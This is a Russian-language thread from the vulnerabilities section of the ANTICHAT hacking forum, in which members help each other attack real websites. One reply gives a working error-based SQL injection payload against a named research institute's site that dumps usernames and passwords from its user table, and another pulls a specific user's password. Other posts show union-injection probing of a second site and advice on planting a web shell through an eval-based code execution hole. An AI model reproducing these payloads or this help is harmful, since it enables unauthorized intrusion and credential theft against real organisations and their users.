HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2801  
Старый 31.03.2020, 14:21
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Хелп, помогите раскрутить

Код:
Code:
https://www.mpisoc.mpg.de/sozialrecht/publikationen/detail/publication/a'/
 
Ответить с цитированием

  #2802  
Старый 01.04.2020, 00:28
neur0funk
Guest
Сообщений: n/a
Провел на форуме:
5363

Репутация: 12
По умолчанию

Цитата:
Сообщение от DezMond™  
DezMond™ said:

Хелп, помогите раскрутить
Код:
Code:
https://www.mpisoc.mpg.de/sozialrecht/publikationen/detail/publication/a'/
/sozialrecht/publikationen/detail/publication/a'=(extractvalue(0x0a,concat(0x0a,(select(group_co ncat(concat_ws(0x3a,username,password)))from(be_us ers)))))='a/

a'=(extractvalue(0x0a,concat(0x0a,(select(group_co ncat(substring(password,20,30)))from(be_users)wher e(username='rtisch')))))='a/
 
Ответить с цитированием

  #2803  
Старый 03.04.2020, 06:14
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Хочу логировать все POST запросы к серверу, есть ли такая возможность без рута? Аналог tcpdump или какие-нибудь другие методы
 
Ответить с цитированием

  #2804  
Старый 03.04.2020, 12:01
fandor9
Guest
Сообщений: n/a
Провел на форуме:
169390

Репутация: 47
По умолчанию

Цитата:
Сообщение от pinch  
pinch said:

Хочу логировать все POST запросы к серверу, есть ли такая возможность без рута? Аналог tcpdump или какие-нибудь другие методы
Мониторинг трафика требует прямого обращение к сетевому интерфейсу и потому права рута (ну или права группы netdev). Возможно настроить апач/nginx что-бы они все сливали в лог. Вариант номер 3 это приписать логирование в приложение.
 
Ответить с цитированием

  #2805  
Старый 12.05.2020, 06:29
holdik
Guest
Сообщений: n/a
Провел на форуме:
3124

Репутация: 2
По умолчанию

Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю
 
Ответить с цитированием

  #2806  
Старый 12.05.2020, 12:14
neur0funk
Guest
Сообщений: n/a
Провел на форуме:
5363

Репутация: 12
По умолчанию

Цитата:
Сообщение от holdik  
holdik said:

Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю
создать файл, данные постом передать
 
Ответить с цитированием

  #2807  
Старый 13.05.2020, 06:19
aberkroft
Guest
Сообщений: n/a
Провел на форуме:
14421

Репутация: 3
По умолчанию

Цитата:
Сообщение от holdik  
holdik said:

Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю
Запрещены где ? На хосте или waf-ом ?
 
Ответить с цитированием

  #2808  
Старый 14.05.2020, 13:21
FireRidlle
Новичок
Регистрация: 07.07.2009
Сообщений: 2
Провел на форуме:
16896

Репутация: 0
По умолчанию

подскажите как заюзать и достать бд

Код:
Code:
?search=-")+or+1=1+limit+10--+-
выодит 10 записей

Код:
Code:
?search=-")+order+by+1--+-
ошибки нет, но при order by 2 ошибка

Код:
Code:
?search=-")+union+select+1--+-
не выводит "1".

думал там какая то разновидность такого запроса. то есть вероятней всего результат первого запроса (уявимого) передается в WHERE для второго запроса

Код:
Code:
ids = SELECT id FROM users
WHERE group="XXXX" AND (name LIKE "%$GET['search']%" OR email LIKE "%$GET['search']%"
)
SELECT * FROM users WHERE id IN(ids)
сделал запрос типа

Код:
Code:
?search=-")+union+select+217--+-
где 217 это мой id. но результат пустой(
 
Ответить с цитированием

  #2809  
Старый 14.05.2020, 21:40
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Есть новость что воровали банковские данные через иконку сайта, мол иконка выдавалась на всех страницах но на сранице оплаты выдавался js файл keylogger. Это как что за тэг там был что работал и favicon и js?

https://www.bleepingcomputer.com/ne...te-favicon-to-camouflage-credit-card-skimmer/
 
Ответить с цитированием

  #2810  
Старый 16.05.2020, 20:39
FireRidlle
Новичок
Регистрация: 07.07.2009
Сообщений: 2
Провел на форуме:
16896

Репутация: 0
По умолчанию

апдейт к предыдущему посту.

Код:
Code:
") union select 1 -- -
ошибка нет, 1 не выводит

Код:
Code:
") or id=2 union select 1 -- -
ошибка
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ